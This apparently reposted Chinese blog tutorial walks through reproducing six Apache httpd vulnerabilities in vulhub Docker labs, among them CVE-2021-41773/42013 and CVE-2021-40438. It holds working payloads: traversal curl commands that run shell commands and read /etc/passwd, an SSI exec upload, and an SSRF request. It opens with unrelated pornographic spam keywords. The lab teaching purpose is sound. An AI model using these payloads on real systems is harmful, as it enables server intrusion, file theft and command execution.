国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache Httpd 常見漏洞解析(全)

這篇具有很好參考價(jià)值的文章主要介紹了Apache Httpd 常見漏洞解析(全)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

一、Apache HTTPD 換行解析漏洞

漏洞編號(hào):CVE-2017-15715

Apache HTTPD是一款HTTP服務(wù)器,它可以通過mod_php來運(yùn)行PHP網(wǎng)頁。

其2.4.0~2.4.29版本中存在一個(gè)解析漏洞。

在解析PHP時(shí),1.php\x0A將被按照PHP后綴進(jìn)行解析,導(dǎo)致繞過一些服務(wù)器的安全策略。

①環(huán)境啟用

cd vulhub/httpd/CVE-2017-15715

②編譯和運(yùn)行

docker-compose build
docker-compose up -d

③訪問漏洞環(huán)境

http://192.168.200.3:8080/

Apache Httpd 常見漏洞解析(全),apache

編寫一句話木馬上傳文件123.php,上傳都是失敗的

Apache Httpd 常見漏洞解析(全),apache

④解決方法

在123.php后面插入一個(gè)**\x0A**(注意,不能是\x0D\x0A,只能是一個(gè)\x0A),不再攔截,這里只需要選中0d,右擊選擇insert byte…后,輸入0a即可插入至里面,然后發(fā)送。

Apache Httpd 常見漏洞解析(全),apache

Apache Httpd 常見漏洞解析(全),apache

二、Apache HTTPD 多后綴解析漏洞

漏洞概述:Apache HTTPD 支持一個(gè)文件擁有多個(gè)后綴,并為不同后綴執(zhí)行不同的指令,比如配置文件: AddHandler application/x-httpd-php .php。在有多個(gè)后綴的情況下,只要一個(gè)文件含有.php后綴的文件即將被識(shí)別成PHP文件,沒必要是最后一個(gè)后綴。利用這個(gè)特性,將會(huì)造成一個(gè)可以繞過上傳白名單的解析漏洞。

①環(huán)境啟用

cd /vulhub/httpd/apache_parsing_vulnerability

②運(yùn)行環(huán)境

docker-compose up -d

③訪問漏洞環(huán)境

http://192.168.200.3

Apache Httpd 常見漏洞解析(全),apache

④解決方法

<?=phpinfo()?>

白名單檢查文件后綴的上傳組件,上傳完成后并未重命名。我們可以通過上傳文件名為xxx.php.jpg或xxx.php.jpeg的文件,利用Apache解析漏洞進(jìn)行g(shù)etshell。

Apache Httpd 常見漏洞解析(全),apache

Apache Httpd 常見漏洞解析(全),apache

Apache Httpd 常見漏洞解析(全),apache

三、Apache SSI 遠(yuǎn)程命令執(zhí)行漏洞

在測試任意文件上傳漏洞的時(shí)候,目標(biāo)服務(wù)端可能不允許上傳php后綴的文件。如果目標(biāo)服務(wù)器開啟了SSI與CGI支持,我們可以上傳一個(gè)shtml文件,并利用

語法執(zhí)行任意命令

①環(huán)境啟用

cd /vulhub/httpd/ssi-rce

②運(yùn)行一個(gè)支持SSI與CGI的Apache服務(wù)器

docker-compose up -d

③訪問漏洞環(huán)境

http://192.168.200.3:8080/upload.php

④解決方法

正常上傳PHP文件是不允許的,我們可以上傳一個(gè)shell.shtml文件:

<!--#exec cmd="ls" --> # 可以使用其他指令

Apache Httpd 常見漏洞解析(全),apache

Apache Httpd 常見漏洞解析(全),apache

四、Apache HTTP 路徑穿越漏洞

漏洞編號(hào):CVE-2021-41773

在其2.4.49版本中,引入了一個(gè)路徑穿越漏洞,滿足下面兩個(gè)條件的Apache服務(wù)器將會(huì)受到影響:

  • 版本等于2.4.49
  • 穿越的目錄允許被訪問(默認(rèn)情況下是不允許的)

攻擊者利用這個(gè)漏洞,可以讀取位于Apache服務(wù)器Web目錄以外的其他文件,或者讀取Web目錄中的腳本文件源碼,或者在開啟了cgi或cgid的服務(wù)器上執(zhí)行任意命令

①環(huán)境啟用

cd /vulhub/httpd/CVE-2021-41773

②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器

docker-compose build
docker-compose up -d

③訪問漏洞環(huán)境

http://192.168.200.3:8080/

Apache Httpd 常見漏洞解析(全),apache

④解決方法

使用如下CURL命令來發(fā)送Payload(注意其中的**/icons/**必須是一個(gè)存在且可訪問的目錄):

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

Apache Httpd 常見漏洞解析(全),apache

在服務(wù)端開啟了cgi或cgid這兩個(gè)mod的情況下,這個(gè)路徑穿越漏洞將可以執(zhí)行任意命令:

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

Apache Httpd 常見漏洞解析(全),apache

curl -v --data "echo;whoami" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

Apache Httpd 常見漏洞解析(全),apache

五、Apache HTTP 路徑穿越漏洞

漏洞編號(hào):CVE-2021-42013

Apache HTTP 服務(wù)器項(xiàng)目旨在為包括 UNIX 和 Windows 在內(nèi)的現(xiàn)代操作系統(tǒng)開發(fā)和維護(hù)開源 HTTP 服務(wù)器。

CVE-2021-42013 是一個(gè)漏洞,由 CVE-2021-41773 修復(fù)不完整導(dǎo)致,攻擊者可以使用路徑遍歷攻擊將 URL 映射到類別名指令配置的目錄之外的文件。

此漏洞影響 Apache HTTP Server 2.4.49 和 2.4.50,而不是早期版本。

①環(huán)境啟用

cd /vulhub/httpd/CVE-2021-42013

②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器

docker-compose build
docker-compose up -d

③訪問漏洞環(huán)境

http://192.168.200.3:8080

④解決方法

Apache HTTP 服務(wù)器 2.4.50 修補(bǔ)了以前的 CVE-2021-41773 有效負(fù)載,例如 ,但它不完整。http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

用于繞過修補(bǔ)程序(請(qǐng)注意,必須是現(xiàn)有目錄):.%%32%65/icons/,但我們可以使用**.%%32%65進(jìn)行繞過(注意其中的/icons/**必須是一個(gè)存在且可訪問的目錄):

curl -v --path-as-is http://192.168.200.3:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

已成功披露:/etc/passwd

Apache Httpd 常見漏洞解析(全),apache

服務(wù)端開啟了cgi或cgid這兩個(gè)mod的情況下,這個(gè)路徑穿越漏洞將可以執(zhí)行任意命令:

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

Apache Httpd 常見漏洞解析(全),apache

六、Apache HTTP SSRF漏洞

漏洞編號(hào):CVE-2021-40438

Apache HTTP Server是Apache基金會(huì)開源的一款流行的HTTP服務(wù)器。在其2.4.48及以前的版本中,mod_proxy模塊存在一處邏輯錯(cuò)誤導(dǎo)致攻擊者可以控制反向代理服務(wù)器的地址,進(jìn)而導(dǎo)致SSRF漏洞。

①環(huán)境啟用

cd /vulhub/httpd/CVE-2021-40438

②執(zhí)行以下命令以啟動(dòng)易受攻擊的 Apache HTTP 服務(wù)器:

docker compose build
docker compose up -d

③訪問漏洞環(huán)境

192.168.200.3:8080?

Apache Httpd 常見漏洞解析(全),apache

④解決方法

構(gòu)造POC:文章來源地址http://www.zghlxwxcb.cn/news/detail-833887.html

GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/ HTTP/1.1
Host: 192.168.200.3:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

到了這里,關(guān)于Apache Httpd 常見漏洞解析(全)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【W(wǎng)eb】vulhub-httpd apache解析漏洞復(fù)現(xiàn)(1)

    【W(wǎng)eb】vulhub-httpd apache解析漏洞復(fù)現(xiàn)(1)

    目錄 ①CVE-2017-15715 ②apache_parsing_vulnerability 貼出源碼: 意思就是上傳文件的后綴不能是php,php3,php4,php5,phtml,pht 我們看一下.htaccess配置文件 ?這段代碼的作用是告訴 Apache 如何處理以 .php 結(jié)尾的請(qǐng)求,確保這些請(qǐng)求能夠被正確地解釋和執(zhí)行 PHP 代碼,并將結(jié)果返回給客戶端。 這

    2024年02月04日
    瀏覽(15)
  • 【漏洞復(fù)現(xiàn)】Apache_HTTPD_換行解析漏洞(CVE-2017-15715)

    【漏洞復(fù)現(xiàn)】Apache_HTTPD_換行解析漏洞(CVE-2017-15715)

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說明 內(nèi)容 漏洞編號(hào) CVE-2017-15715 漏洞名稱 Apache HTTPD 換行解析漏洞 漏洞評(píng)級(jí) 高危 影響范圍 2.4.0~2.4.29 漏洞描述 在解析PHP時(shí), 1.phpx0A 將被按照PHP后綴進(jìn)行解析,導(dǎo)致繞過一些服務(wù)器的安全策略 修復(fù)方案

    2024年02月05日
    瀏覽(23)
  • Vulhub之Apache HTTPD 換行解析漏洞(CVE-2017-15715)

    Vulhub之Apache HTTPD 換行解析漏洞(CVE-2017-15715)

    Apache HTTPD是一款HTTP服務(wù)器,它可以通過mod_php來運(yùn)行PHP網(wǎng)頁。其 2.4.0~2.4.29 版本中存在一個(gè)解析漏洞,在解析PHP時(shí), 1.phpx0A 將被按照PHP后綴進(jìn)行解析,導(dǎo)致繞過一些服務(wù)器的安全策略。 1、docker-compose build、docker-compose up -d啟動(dòng)環(huán)境 ?2、隨意上傳圖片,并發(fā)送到repeater ?3、切換

    2024年02月13日
    瀏覽(24)
  • Apache HTTPD 漏洞復(fù)現(xiàn)

    Apache HTTPD 漏洞復(fù)現(xiàn)

    鏈接地址:Vulhub - Docker-Compose file for vulnerability environment。 1.1 漏洞描述 說明 內(nèi)容 漏洞編號(hào) 無 漏洞名稱 Apache HTTPD 多后綴解析漏洞 漏洞評(píng)級(jí) 高危 漏洞描述 在有多個(gè)后綴的情況下,只要一個(gè)文件含有.php后綴的文件即將被識(shí)別成PHP文件,沒必要是最后一個(gè)后綴。利用這個(gè)特性

    2024年02月09日
    瀏覽(22)
  • Apache httpd漏洞復(fù)現(xiàn)

    Apache httpd漏洞復(fù)現(xiàn)

    該漏洞與Apache、php版本無關(guān),屬于用戶配置不當(dāng)造成的解析漏洞。在有多個(gè)后綴的情況下,只要一個(gè)文件含有 .php 后綴的文件即將被識(shí)別成PHP文件,沒必要是最后一個(gè)后綴。 啟動(dòng)upload-labs-env-win-0.1目錄下的phpstudy,打開bp自帶的瀏覽器,訪問虛擬機(jī)的本機(jī)地址127.0.0.1,來到up

    2024年02月09日
    瀏覽(17)
  • 中間件安全—Apache常見漏洞

    中間件安全—Apache常見漏洞

    ??簡單介紹一下apache是什么,Apache是世界使用排名第一的Web服務(wù)器軟件。它可以運(yùn)行在幾乎所有廣泛使用的計(jì)算機(jī)上,由于其跨平臺(tái)和安全性被廣泛使用,是最流行的Web服務(wù)器端軟件之一。它快速、可靠并且可通過簡單的API擴(kuò)充,將python等解釋器編譯到服務(wù)器中。 1.2.1.漏洞

    2024年01月22日
    瀏覽(22)
  • 24、文件上傳漏洞——Apache文件解析漏洞

    24、文件上傳漏洞——Apache文件解析漏洞

    ??Apache文件解析漏洞與用戶配置有密切關(guān)系。嚴(yán)格來說,屬于用戶配置問題,這里使用ubantu的docker來復(fù)現(xiàn)漏洞: CGI:共同網(wǎng)關(guān)接口,是HTTP服務(wù)器與機(jī)器上其他程序進(jìn)行通信的一個(gè)接口,讓web服務(wù)器必要時(shí)啟動(dòng)額外的程序處理動(dòng)態(tài)內(nèi)容。 FastCGI:CGI解釋器的更快實(shí)現(xiàn),可以提

    2024年02月04日
    瀏覽(18)
  • Apache解析漏洞實(shí)驗(yàn)

    Apache解析漏洞實(shí)驗(yàn)

    了解Apache解析漏洞原理 掌握Apache漏洞的利用方法 實(shí)驗(yàn)工具 火狐:Mozilla Firefox,中文俗稱“火狐”(正式縮寫為Fx或fx,非正式縮寫為FF),是一個(gè)自由及開放源代碼網(wǎng)頁瀏覽器,使用Gecko排版引擎,支持多種操作系統(tǒng),如Windows、Mac OS X及GNU/Linux等。 實(shí)驗(yàn)內(nèi)容 什么是網(wǎng)站(we

    2024年02月07日
    瀏覽(35)
  • Apache nginx解析漏洞復(fù)現(xiàn)

    Apache nginx解析漏洞復(fù)現(xiàn)

    將nginx解壓后放到c盤根目錄下: 運(yùn)行startup.bat啟動(dòng)環(huán)境: 在HTML文件夾下有它的主頁文件: nginx在遇到后綴名有php的文件時(shí),會(huì)將該文件給php解釋器處理,在讀取文件時(shí)如果遇到00時(shí)就讀取結(jié)束

    2024年02月09日
    瀏覽(21)
  • Apache兩個(gè)解析漏洞復(fù)現(xiàn)及防御方法

    Apache兩個(gè)解析漏洞復(fù)現(xiàn)及防御方法

    形成原因: 配置apache時(shí),對(duì)于apache配置不熟練,配置命令不清楚,在配置PHP文件處理程序時(shí),配置命令存在問題:位于漏洞環(huán)境目錄的 conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php .php),該命令會(huì)將后綴中只要含有.php的文件都會(huì)被處理程序解析,這導(dǎo)致攻擊者

    2024年02月04日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包